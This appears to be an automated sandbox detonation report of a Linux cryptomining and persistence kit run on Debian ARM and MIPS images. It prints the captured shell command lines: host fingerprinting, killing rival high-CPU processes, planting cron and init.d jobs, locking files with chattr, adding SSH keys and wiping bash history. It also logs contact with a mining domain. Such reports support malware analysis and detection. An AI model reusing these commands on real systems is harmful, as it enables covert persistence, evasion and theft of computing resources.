File opened for reading /proc/197/stat /usr/bin/ps N/A
File opened for reading /proc/963/cmdline /usr/bin/ps N/A
File opened for reading /proc/207/stat /usr/bin/ps N/A
File opened for reading /proc/553/status /usr/bin/ps N/A
File opened for reading /proc/119/status /usr/bin/ps N/A
File opened for reading /proc/1307/cmdline /usr/bin/ps N/A
File opened for reading /proc/1183/cmdline /usr/bin/ps N/A
File opened for reading /proc/86/status /usr/bin/ps N/A
File opened for reading /proc/209/stat /usr/bin/ps N/A
File opened for reading /proc/1221/status /usr/bin/ps N/A
File opened for reading /proc/209/status /usr/bin/ps N/A
File opened for reading /proc/412/status /usr/bin/ps N/A
File opened for reading /proc/12/status /usr/bin/ps N/A
File opened for reading /proc/14/status /usr/bin/ps N/A
File opened for reading /proc/27/status /usr/bin/ps N/A
File opened for reading /proc/1172/cmdline /usr/bin/ps N/A
File opened for reading /proc/self/maps /usr/bin/awk N/A
File opened for reading /proc/self/maps /usr/bin/awk N/A
File opened for reading /proc/1140/stat /usr/bin/ps N/A
File opened for reading /proc/78/cmdline /usr/bin/ps N/A
File opened for reading /proc/417/stat /usr/bin/ps N/A
File opened for reading /proc/1038/stat /usr/bin/ps N/A
File opened for reading /proc/16/status /usr/bin/ps N/A
File opened for reading /proc/638/status /usr/bin/ps N/A
File opened for reading /proc/991/status /usr/bin/ps N/A
File opened for reading /proc/90/status /usr/bin/ps N/A
File opened for reading /proc/845/cmdline /usr/bin/ps N/A
File opened for reading /proc/1342/status /usr/bin/ps N/A
File opened for reading /proc/1427/status /usr/bin/ps N/A
File opened for reading /proc/767/status /usr/bin/ps N/A
File opened for reading /proc/1163/stat /usr/bin/ps N/A
File opened for reading /proc/1637/stat /usr/bin/ps N/A
File opened for reading /proc/453/stat /usr/bin/ps N/A
File opened for reading /proc/1362/cmdline /usr/bin/ps N/A
File opened for reading /proc/209/stat /usr/bin/ps N/A
File opened for reading /proc/222/status /usr/bin/ps N/A
File opened for reading /proc/409/status /usr/bin/ps N/A
File opened for reading /proc/114/status /usr/bin/ps N/A
File opened for reading /proc/1124/status /usr/bin/ps N/A
File opened for reading /proc/5/stat /usr/bin/ps N/A
File opened for reading /proc/213/status /usr/bin/ps N/A
File opened for reading /proc/1013/cmdline /usr/bin/ps N/A
File opened for reading /proc/1245/status /usr/bin/ps N/A
File opened for reading /proc/767/cmdline /usr/bin/ps N/A
File opened for reading /proc/1013/stat /usr/bin/ps N/A
File opened for reading /proc/5/stat /usr/bin/ps N/A
File opened for reading /proc/1054/status /usr/bin/ps N/A
File opened for reading /proc/7/stat /usr/bin/ps N/A
File opened for reading /proc/991/cmdline /usr/bin/ps N/A
File opened for reading /proc/1162/stat /usr/bin/ps N/A
File opened for reading /proc/6/status /usr/bin/ps N/A
File opened for reading /proc/1560/cmdline /usr/bin/ps N/A
File opened for reading /proc/driver/nvidia/gpus /tmp/.update/.x86_64 N/A
File opened for reading /proc/94/status /usr/bin/ps N/A
File opened for reading /proc/415/cmdline /usr/bin/ps N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.update/.cron /bin/sh N/A
File opened for modification /tmp/.lock /tmp/.update/.x86_64 N/A

Processes

/tmp/.update/.x86_64

[/tmp/.update/.x86_64]

/bin/sh

[sh -c echo "[$(hostname=$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo $hostname | awk {'print $1'} 2>/dev/null)$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print "-"$2'} 2>/dev/null)][$(whoami 2>/dev/null)][$(hostname 2>/dev/null)][$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][$(X=$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/$//' 2>/dev/null); if [ $(echo $X 2>/dev/null | awk {'print $1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ $(echo $X 2>/dev/null | awk {'print $4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ $(echo $X 2>/dev/null | awk {'print $4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ $(echo $X 2>/dev/null | awk {'print $3'} 2>/dev/null) = 'CPU' ]; then echo $X 2>/dev/null | awk {'print $4'} 2>/dev/null; elif [ $(echo $X 2>/dev/null | awk {'print $4'} 2>/dev/null) = 'CPU' ]; then echo $X 2>/dev/null | awk {'print $3'} 2>/dev/null; elif [ $(echo $X 2>/dev/null | awk {'print $1'} 2>/dev/null) = 'AMD' ]; then echo $X 2>/dev/null | awk {'print $2" "$3" "$4'} 2>/dev/null; else echo $X 2>/dev/null; fi)]"]

/usr/bin/hostname

[hostname -I]

/usr/bin/awk

[awk {print $1}]

/usr/bin/awk

[awk {print "-"$2}]

/usr/bin/head

[head -n 1]

/usr/bin/grep

[grep Port ]

/usr/bin/cat

[cat /etc/ssh/sshd_config]

/usr/bin/whoami

[whoami]

/usr/bin/hostname

[hostname]

/usr/bin/grep

[grep -c ^processor /proc/cpuinfo]

/usr/bin/sed

[sed -e s/$//]

/usr/bin/sed

[sed -e s/^ *//]

/usr/bin/cut

[cut -d: -f2]

/usr/bin/grep

[grep -m 1 model name /proc/cpuinfo]

/usr/bin/awk

[awk {print $1}]

/usr/bin/awk

[awk {print $4}]

/usr/bin/awk

[awk {print $4}]

/usr/bin/awk

[awk {print $3}]

/usr/bin/awk

[awk {print $4}]

/usr/bin/awk

[awk {print $1}]

/usr/bin/awk

[awk {print $2" "$3" "$4}]

/bin/sh

[sh -c ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[$2]++ {print $2}' 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done fi]

/usr/bin/awk

[awk /[zZ]/ && !a[$2]++ {print $2}]

/usr/bin/ps

[ps -A -ostat,ppid]

/usr/bin/id

[id -u]

/usr/bin/grep

[grep -v grep]

/usr/bin/grep

[grep /etc/cron]

/usr/bin/ps

[ps x]

/bin/sh

[sh -c if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done fi]

/usr/bin/id

[id -u]

/usr/bin/awk

[awk {if($3>30.0) print $2}]

/usr/bin/grep

[grep -v /usr/sbin/httpd]

/usr/bin/grep

[grep -v -- -bash[[:space:]]*$]

/usr/bin/grep

[grep -v grep]

/usr/bin/ps

[ps aux]

/bin/sh

[sh -c dir=`pwd 2>/dev/null`;rm -rf $dir/.cron 2>/dev/null;crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep -v '/tmp/.update/.x86_64' 2>/dev/null > .cron 2>/dev/null;echo '* * * * * '$dir/'/tmp/.update/.x86_64' >> .cron 2>/dev/null; if [ $(crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep '/tmp/.update/.x86_64$' 2>/dev/null | sort 2>/dev/null | uniq 2>/dev/null | wc -l 2>/dev/null) -eq '0' ]; then crontab $dir/.cron 2>/dev/null; fi;rm -rf $dir/.cron 2>/dev/null]

/usr/bin/rm

[rm -rf /tmp/.update/.cron]

/usr/bin/grep

[grep -v /tmp/.update/.x86_64]

/usr/bin/grep

[grep -v grep]

/usr/bin/crontab

[crontab -l]

/usr/bin/wc

[wc -l]

/usr/bin/uniq

[uniq]

/usr/bin/sort

[sort]

/usr/bin/grep

[grep /tmp/.update/.x86_64$]

/usr/bin/grep

[grep -v grep]

/usr/bin/crontab

[crontab -l]

/usr/bin/crontab

[crontab /tmp/.update/.cron]

/usr/bin/rm

[rm -rf /tmp/.update/.cron]

/bin/sh

[sh -c if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*$' 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*$' 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u $myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*$' 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u $myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*$' 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done fi fi]

/usr/bin/id

[id -u]

/usr/bin/wc

[wc -l]

/usr/bin/awk

[awk {if($3>30.0) print $2}]

/usr/bin/grep

[grep -- -bash[[:space:]]*$]

/usr/bin/grep

[grep -v grep]

/usr/bin/ps

[ps aux]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 N/A udp
US 8.8.8.8:53 xmr-rx0.pwndns.pw udp
US 8.8.8.8:53 xmr-rx0.pwndns.pw udp
US 137.184.223.223:80 xmr-rx0.pwndns.pw tcp

Files

memory/1561-1-0x00007f1992cec000-0x00007f19933aad40-memory.dmp

/tmp/.update/.cron


/var/spool/cron/crontabs/tmp.NdujH4


Analysis: behavioral12

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:39

Platform

debian9-armhf-20240418-en

Max time kernel

0s

Command Line

[/tmp/.systemd/clean]

Signatures

N/A

Processes

/tmp/.systemd/clean

[/tmp/.systemd/clean]

/bin/uname

[uname -m]

/bin/rm

[rm -rf systemd.d systemd.dir auth auto clean .run go ntpdate]

/bin/rm

[rm -rf /root/.bash_history]

Network

N/A

Files

N/A

Analysis: behavioral22

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:39

Platform

debian9-mipsel-20240418-en

Max time kernel

3s

Command Line

[/tmp/.systemd/ntpdate]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Attempts to change immutable files

Description Indicator Process Target
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A

Creates/modifies Cron job

execution persistence privilege_escalation
Description Indicator Process Target
File opened for modification /etc/cron.hourly/ntpdate /usr/bin/tee N/A
File opened for modification /etc/cron.monthly/ntpdate /usr/bin/tee N/A
File opened for modification /etc/cron.weekly/ntpdate /usr/bin/tee N/A
File opened for modification /etc/cron.d/ntpdate /usr/bin/tee N/A
File opened for modification /etc/cron.daily/ntpdate /usr/bin/tee N/A

Modifies init.d

persistence
Description Indicator Process Target
File opened for modification /etc/init.d/ntpdate /usr/bin/tee N/A

Writes file to system bin folder

Description Indicator Process Target
File opened for modification /sbin/lntpdate /usr/bin/tee N/A
File opened for modification /sbin/entpdate /usr/bin/tee N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/filesystems /bin/mkdir N/A
File opened for reading /proc/filesystems /bin/cp N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/cp N/A
N/A N/A /bin/cp N/A
N/A N/A /bin/cp N/A
N/A N/A /bin/cp N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.systemd/systemd.dir /tmp/.systemd/ntpdate N/A

Processes

/tmp/.systemd/ntpdate

[/tmp/.systemd/ntpdate]

/bin/uname

[uname -m]

/bin/cat

[cat systemd.dir]

/bin/mkdir

[mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly]

/usr/bin/chattr

[chattr -i -a /etc/cron.*/ntpdate /sbin/bcrond]

/bin/rm

[rm -rf /sbin/bcrond]

/bin/cp

[cp -f -r -- /tmp/.systemd/.mips /sbin/bcrond]

/usr/bin/tee

[tee -a /etc/cron.d/ntpdate /etc/cron.daily/ntpdate /etc/cron.hourly/ntpdate /etc/cron.monthly/ntpdate /etc/cron.weekly/ntpdate]

/bin/chmod

[chmod +x /etc/cron.daily/ntpdate /etc/cron.d/ntpdate /etc/cron.hourly/ntpdate /etc/cron.monthly/ntpdate /etc/cron.weekly/ntpdate /sbin/bcrond]

/usr/bin/chattr

[chattr +i +a /etc/cron.daily/ntpdate /etc/cron.d/ntpdate /etc/cron.hourly/ntpdate /etc/cron.monthly/ntpdate /etc/cron.weekly/ntpdate /sbin/bcrond]

/usr/bin/chattr

[chattr -a -i /sbin/bsysd]

/bin/rm

[rm -rf /sbin/bsysd]

/usr/bin/which

[which systemctl]

/usr/bin/chattr

[chattr -i -a /sbin/entpdate /sbin/bsysde]

/bin/rm

[rm -rf /sbin/bsysde]

/bin/cp

[cp -f -r -- /tmp/.systemd/.mips /sbin/bsysde]

/usr/bin/tee

[tee -a /sbin/entpdate]

/bin/chmod

[chmod +x /sbin/entpdate]

/usr/bin/chattr

[chattr +i +a /sbin/entpdate /sbin/bsysde]

/usr/bin/which

[which systemctl]

/usr/bin/chattr

[chattr -i -a /sbin/lntpdate /sbin/bsysdl]

/bin/rm

[rm -rf /sbin/bsysdl]

/bin/cp

[cp -f -r -- /tmp/.systemd/.mips /sbin/bsysdl]

/usr/bin/tee

[tee -a /sbin/lntpdate]

/bin/chmod

[chmod +x /sbin/lntpdate]

/usr/bin/chattr

[chattr +i +a /sbin/lntpdate /sbin/bsysdl]

/usr/bin/which

[which update-rc.d]

/usr/bin/chattr

[chattr -i -a /etc/init.d/ntpdate /sbin/binitd]

/bin/rm

[rm -rf /sbin/binitd]

/bin/cp

[cp -f -r -- /tmp/.systemd/.mips /sbin/binitd]

/usr/bin/tee

[tee -a /etc/init.d/ntpdate]

/bin/chmod

[chmod +x /etc/init.d/ntpdate /sbin/binitd]

/usr/bin/chattr

[chattr +i +a /etc/init.d/ntpdate /sbin/binitd]

/usr/bin/which

[which chkconfig]

Network

N/A

Files

/tmp/.systemd/systemd.dir


/etc/cron.d/ntpdate


/sbin/entpdate


/sbin/lntpdate


/etc/init.d/ntpdate


Analysis: behavioral25

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:39

Platform

debian9-armhf-20240729-en

Max time kernel

0s

Command Line

[/tmp/.update/.run]

Signatures

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.update/update.dir /tmp/.update/.run N/A
File opened for modification /tmp/.update/.update /tmp/.update/.run N/A

Processes

/tmp/.update/.run

[/tmp/.update/.run]

/bin/uname

[uname -m]

/bin/cat

[cat update.dir]

/tmp/.update/.armv7l

[./.armv7l -f]

Network

N/A

Files

/tmp/.update/update.dir


/tmp/.update/.update


Analysis: behavioral30

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:40

Platform

debian9-armhf-20240611-en

Max time kernel

4s

Command Line

[/tmp/.update/auth]

Signatures

Adds new SSH keys

persistence privilege_escalation
Description Indicator Process Target
File opened for modification /home/user/.ssh/authorized_keys /tmp/.update/auth N/A
File opened for modification /root/.ssh/authorized_keys /tmp/.update/auth N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /bin/mkdir N/A
File opened for reading /proc/filesystems /bin/sed N/A
File opened for reading /proc/filesystems /bin/mkdir N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.update/authusers /tmp/.update/auth N/A

Processes

/tmp/.update/auth

[/tmp/.update/auth]

/bin/uname

[uname -n]

/bin/mkdir

[mkdir /root/.ssh]

/bin/chmod

[chmod 0700 /root/.ssh]

/bin/chmod

[chmod 0644 /root/.ssh/authorized_keys]

/usr/bin/chattr

[chattr +ai /root/.ssh /root/.ssh/authorized_keys]

/bin/rm

[rm -rf authusers]

/bin/cat

[cat /etc/passwd]

/bin/grep

[grep -e /bin/sh -e /bin/bash]

/usr/bin/cut

[cut -d : -f 1]

/usr/bin/cut

[cut -d : -f 6]

/usr/bin/chattr

[chattr -ai /root/.ssh /root/.ssh/authorized_keys]

/bin/sed

[sed -i /r78x7ECphuPrGrR4SDqE1w/d /root/.ssh/authorized_keys]

/usr/bin/cut

[cut -d : -f 1]

/usr/bin/cut

[cut -d : -f 6]

/bin/mkdir

[mkdir /home/user/.ssh]

/bin/chown

[chown -R user /home/user/.ssh]

Network

N/A

Files

/root/.ssh/authorized_keys


/tmp/.update/authusers


/tmp/.update/authusers


Analysis: behavioral4

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:39

Platform

debian9-mipsbe-20240729-en

Max time kernel

2s

Command Line

[/tmp/.systemd/.run]

Signatures

Enumerates running processes

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/16/stat /bin/ps N/A
File opened for reading /proc/18/status /bin/ps N/A
File opened for reading /proc/70/cmdline /bin/ps N/A
File opened for reading /proc/672/status /bin/ps N/A
File opened for reading /proc/13/status /bin/ps N/A
File opened for reading /proc/379/cmdline /bin/ps N/A
File opened for reading /proc/10/stat /bin/ps N/A
File opened for reading /proc/72/stat /bin/ps N/A
File opened for reading /proc/172/status /bin/ps N/A
File opened for reading /proc/10/status /bin/ps N/A
File opened for reading /proc/380/stat /bin/ps N/A
File opened for reading /proc/675/cmdline /bin/ps N/A
File opened for reading /proc/13/stat /bin/ps N/A
File opened for reading /proc/4/stat /bin/ps N/A
File opened for reading /proc/15/stat /bin/ps N/A
File opened for reading /proc/732/stat /bin/ps N/A
File opened for reading /proc/737/stat /bin/ps N/A
File opened for reading /proc/18/stat /bin/ps N/A
File opened for reading /proc/110/cmdline /bin/ps N/A
File opened for reading /proc/82/cmdline /bin/ps N/A
File opened for reading /proc/157/status /bin/ps N/A
File opened for reading /proc/232/cmdline /bin/ps N/A
File opened for reading /proc/1/cmdline /bin/ps N/A
File opened for reading /proc/4/cmdline /bin/ps N/A
File opened for reading /proc/728/cmdline /bin/ps N/A
File opened for reading /proc/385/stat /bin/ps N/A
File opened for reading /proc/726/status /bin/ps N/A
File opened for reading /proc/232/stat /bin/ps N/A
File opened for reading /proc/334/stat /bin/ps N/A
File opened for reading /proc/334/status /bin/ps N/A
File opened for reading /proc/3/stat /bin/ps N/A
File opened for reading /proc/12/status /bin/ps N/A
File opened for reading /proc/337/status /bin/ps N/A
File opened for reading /proc/11/cmdline /bin/ps N/A
File opened for reading /proc/10/status /bin/ps N/A
File opened for reading /proc/1/cmdline /bin/ps N/A
File opened for reading /proc/20/status /bin/ps N/A
File opened for reading /proc/749/cmdline /bin/ps N/A
File opened for reading /proc/10/cmdline /bin/ps N/A
File opened for reading /proc/686/status /bin/ps N/A
File opened for reading /proc/728/status /bin/ps N/A
File opened for reading /proc/sys/kernel/pid_max /bin/ps N/A
File opened for reading /proc/122/status /bin/ps N/A
File opened for reading /proc/365/stat /bin/ps N/A
File opened for reading /proc/70/stat /bin/ps N/A
File opened for reading /proc/73/cmdline /bin/ps N/A
File opened for reading /proc/9/status /bin/ps N/A
File opened for reading /proc/17/stat /bin/ps N/A
File opened for reading /proc/706/cmdline /bin/ps N/A
File opened for reading /proc/9/cmdline /bin/ps N/A
File opened for reading /proc/750/cmdline /bin/ps N/A
File opened for reading /proc/3/status /bin/ps N/A
File opened for reading /proc/12/stat /bin/ps N/A
File opened for reading /proc/17/cmdline /bin/ps N/A
File opened for reading /proc/725/cmdline /bin/ps N/A
File opened for reading /proc/73/cmdline /bin/ps N/A
File opened for reading /proc/75/stat /bin/ps N/A
File opened for reading /proc/675/cmdline /bin/ps N/A
File opened for reading /proc/232/stat /bin/ps N/A
File opened for reading /proc/247/stat /bin/ps N/A
File opened for reading /proc/736/status /bin/ps N/A
File opened for reading /proc/22/cmdline /bin/ps N/A
File opened for reading /proc/36/status /bin/ps N/A
File opened for reading /proc/3/status /bin/ps N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/cp N/A

Processes

/tmp/.systemd/.run

[/tmp/.systemd/.run]

/bin/grep

[grep -v R]

/bin/ps

[ps x]

/bin/grep

[grep ssh ]

/bin/grep

[grep -v grep]

/usr/bin/awk

[awk {print $1}]

/bin/ps

[ps x]

/bin/grep

[grep ssh$]

/bin/grep

[grep -v R]

/bin/grep

[grep -v grep]

/usr/bin/awk

[awk {print $1}]

/bin/grep

[grep -v R]

/bin/grep

[grep sh$]

/bin/ps

[ps x]

/bin/grep

[grep -v grep]

/usr/bin/awk

[awk {print $1}]

/bin/uname

[uname -m]

/bin/cp

[cp -f -- .mips -bash]

/tmp/.systemd/-bash

[./-bash]

Network

N/A

Files

N/A

Analysis: behavioral9

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:39

Platform

debian9-mipsbe-20240729-en

Max time kernel

1s

Command Line

[/tmp/.systemd/auto]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Creates/modifies Cron job

execution persistence privilege_escalation
Description Indicator Process Target
File opened for modification /var/spool/cron/crontabs/tmp.H4b4Eo /usr/bin/crontab N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/filesystems /usr/bin/crontab N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.systemd/systemd.dir /tmp/.systemd/auto N/A
File opened for modification /tmp/.systemd/systemd.d /tmp/.systemd/auto N/A
File opened for modification /tmp/.systemd/.systemd /tmp/.systemd/auto N/A

Processes

/tmp/.systemd/auto

[/tmp/.systemd/auto]

/bin/uname

[uname -m]

/bin/cat

[cat systemd.dir]

/usr/bin/crontab

[crontab -l]

/bin/grep

[grep .systemd]

/usr/bin/wc

[wc -l]

/usr/bin/crontab

[crontab -l]

/usr/bin/crontab

[crontab systemd.d]

/bin/rm

[rm -rf systemd.d]

/bin/chmod

[chmod u+x .systemd]

Network

N/A

Files

/tmp/.systemd/systemd.dir


/var/spool/cron/crontabs/tmp.H4b4Eo


/tmp/.systemd/.systemd


Analysis: behavioral10

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:40

Platform

debian9-mipsel-20240611-en

Max time kernel

1s

Command Line

[/tmp/.systemd/auto]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Creates/modifies Cron job

execution persistence privilege_escalation
Description Indicator Process Target
File opened for modification /var/spool/cron/crontabs/tmp.53uIAl /usr/bin/crontab N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/filesystems /usr/bin/crontab N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.systemd/systemd.d /tmp/.systemd/auto N/A
File opened for modification /tmp/.systemd/.systemd /tmp/.systemd/auto N/A
File opened for modification /tmp/.systemd/systemd.dir /tmp/.systemd/auto N/A

Processes

/tmp/.systemd/auto

[/tmp/.systemd/auto]

/bin/uname

[uname -m]

/bin/cat

[cat systemd.dir]

/usr/bin/crontab

[crontab -l]

/bin/grep

[grep .systemd]

/usr/bin/wc

[wc -l]

/usr/bin/crontab

[crontab -l]

/usr/bin/crontab

[crontab systemd.d]

/bin/rm

[rm -rf systemd.d]

/bin/chmod

[chmod u+x .systemd]

Network

N/A

Files

/tmp/.systemd/systemd.dir

MD5 1f3a48ead214b69a4e5bbcc12a732ddb
SHA1 3391a93f27a805c58de438e5a50267af13b619ab
SHA256 8ebe6ec5aee16e2d6ea3fe45a22e72ad8f936a83a7fc9e82591885bcb45e322c
SHA512 386b19da83f4b8416d17960a3c0832b38521a3396dbf99501dcf03811e17d1696b18db4131f66375889afc2c44d791dd62239a86d3ba0fa614b8547480a7381d

/var/spool/cron/crontabs/tmp.53uIAl

MD5 dbb47228523c48edfe60dda1b012f03d
SHA1 64adf38fbd662f2cdc856b0a1a1898d60d2e5c14
SHA256 0985d86b6a0b52111095135d4a0e5405848d42318445492d6540784bfc61f30e
SHA512 a720fc83063c925b735443be41ae8857d342c1a6dd64afe3463b6c9c64c35e4725641d3db5dd5ce7f22fc965e77d5218fb0903c592c51c777992e59b9419a287

/tmp/.systemd/.systemd

MD5 9ef2b0f44129dbed4b1284c1d748b10b
SHA1 2bb3bcea6f21a5567090bdacd84ca4b1482d9f68
SHA256 5a2aceb88f74b14be6fb451f8d7d0fb29b5eb5c14a1342c51fddbf312e158cf3
SHA512 e0daccbdd2034b50c8444482efda6d66988b19ac5424ae39452a643993fe3383c8be855a49c83cdaa37bbd1563c7dc0883d2bc96807471558a5bc4209a24738c

Analysis: behavioral20

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:39

Platform

debian9-armhf-20240611-en

Max time kernel

2s

Command Line

[/tmp/.systemd/ntpdate]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Attempts to change immutable files

Description Indicator Process Target
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A

Creates/modifies Cron job

execution persistence privilege_escalation
Description Indicator Process Target
File opened for modification /etc/cron.d/ntpdate /usr/bin/tee N/A
File opened for modification /etc/cron.daily/ntpdate /usr/bin/tee N/A
File opened for modification /etc/cron.hourly/ntpdate /usr/bin/tee N/A
File opened for modification /etc/cron.monthly/ntpdate /usr/bin/tee N/A
File opened for modification /etc/cron.weekly/ntpdate /usr/bin/tee N/A

Modifies init.d

persistence
Description Indicator Process Target
File opened for modification /etc/init.d/ntpdate /usr/bin/tee N/A

Writes file to system bin folder

Description Indicator Process Target
File opened for modification /sbin/entpdate /usr/bin/tee N/A
File opened for modification /sbin/lntpdate /usr/bin/tee N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /bin/mkdir N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/filesystems /bin/cp N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.systemd/systemd.dir /tmp/.systemd/ntpdate N/A

Processes

/tmp/.systemd/ntpdate

[/tmp/.systemd/ntpdate]

/bin/uname

[uname -m]

/bin/cat

[cat systemd.dir]

/bin/mkdir

[mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly]

/usr/bin/chattr

[chattr -i -a /etc/cron.*/ntpdate /sbin/bcrond]

/bin/rm

[rm -rf /sbin/bcrond]

/bin/cp

[cp -f -r -- /tmp/.systemd/.armv7l /sbin/bcrond]

/usr/bin/tee

[tee -a /etc/cron.d/ntpdate /etc/cron.daily/ntpdate /etc/cron.hourly/ntpdate /etc/cron.monthly/ntpdate /etc/cron.weekly/ntpdate]

/bin/chmod

[chmod +x /etc/cron.daily/ntpdate /etc/cron.d/ntpdate /etc/cron.hourly/ntpdate /etc/cron.monthly/ntpdate /etc/cron.weekly/ntpdate /sbin/bcrond]

/usr/bin/chattr

[chattr +i +a /etc/cron.daily/ntpdate /etc/cron.d/ntpdate /etc/cron.hourly/ntpdate /etc/cron.monthly/ntpdate /etc/cron.weekly/ntpdate /sbin/bcrond]

/usr/bin/chattr

[chattr -a -i /sbin/bsysd]

/bin/rm

[rm -rf /sbin/bsysd]

/usr/bin/which

[which systemctl]

/usr/bin/chattr

[chattr -i -a /sbin/entpdate /sbin/bsysde]

/bin/rm

[rm -rf /sbin/bsysde]

/bin/cp

[cp -f -r -- /tmp/.systemd/.armv7l /sbin/bsysde]

/usr/bin/tee

[tee -a /sbin/entpdate]

/bin/chmod

[chmod +x /sbin/entpdate]

/usr/bin/chattr

[chattr +i +a /sbin/entpdate /sbin/bsysde]

/usr/bin/which

[which systemctl]

/usr/bin/chattr

[chattr -i -a /sbin/lntpdate /sbin/bsysdl]

/bin/rm

[rm -rf /sbin/bsysdl]

/bin/cp

[cp -f -r -- /tmp/.systemd/.armv7l /sbin/bsysdl]

/usr/bin/tee

[tee -a /sbin/lntpdate]

